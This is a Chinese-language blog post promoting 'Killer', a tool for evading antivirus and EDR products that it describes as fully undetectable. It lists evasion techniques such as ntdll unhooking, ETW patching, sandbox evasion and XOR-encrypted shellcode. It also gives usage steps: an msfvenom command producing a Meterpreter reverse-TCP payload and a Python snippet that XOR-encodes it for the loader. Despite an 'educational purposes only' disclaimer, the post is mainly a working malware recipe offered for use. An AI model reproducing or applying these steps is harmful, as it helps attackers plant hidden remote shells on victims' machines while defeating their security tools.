![Killer | 一款专为逃避AV、EDR或安全工具所开发的工具插图 Killer | 一款专为逃避AV、EDR或安全工具所开发的工具插图](https://blog.eswlnk.com/wp-content/uploads/wpcy/ba315ba626c6fc129c6ebc7650aba60e.jpg)
这是一款AV/EDR逃避工具,可以用于绕过学习用的安全工具,目前该工具处于FUD状态。
![Killer | 一款专为逃避AV、EDR或安全工具所开发的工具插图1 Killer | 一款专为逃避AV、EDR或安全工具所开发的工具插图1](https://static.esw.eswlnk.com/2023/06/20230615124215160.png-esw)
工具特点:
- 模块破坏用于内存扫描逃避。
- 通过新的ntdll副本取消DLL取消挂接。
- 隐藏IAT和混淆以及API取消挂接。
- 通过ETW Patching绕过某些安全控制。
- 包括沙盒逃避技术和基本的防调试。
- 通过XOR进行完全混淆(函数-密钥-Shellcode)。
- Shellcode被反转和加密。
- 将有效载荷移动到无法使用API的空白内存中。
- GetProcAddress和GetModuleHandle实现@ cocomelonc。
- 运行时不会创建新线程,并支持x64和x86架构。
如何使用:
使用msfvenom工具生成你的shellcode:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py
然后将输出复制到加密器的XOR函数中:
data = ...
key = 0x50
print('{ ', end='')
for i in data:
print(hex(i ^ key), end=', ')
print("0x0 };")
最后,您可以处理解密函数,对于脚本小子来说并不容易,您可以在我的文章中了解更多信息:
- Part 1 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
- Part 2 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
以下是运行后的结果:
![Killer | 一款专为逃避AV、EDR或安全工具所开发的工具插图2 Killer | 一款专为逃避AV、EDR或安全工具所开发的工具插图2](https://static.esw.eswlnk.com/2023/06/20230615124217153.png-esw)
重要提示:
- 首先感谢Abdallah Mohammed为我提供帮助^_^。
- 该工具仅用于教育目的。
- 使用Visual Studio编译代码。
📮评论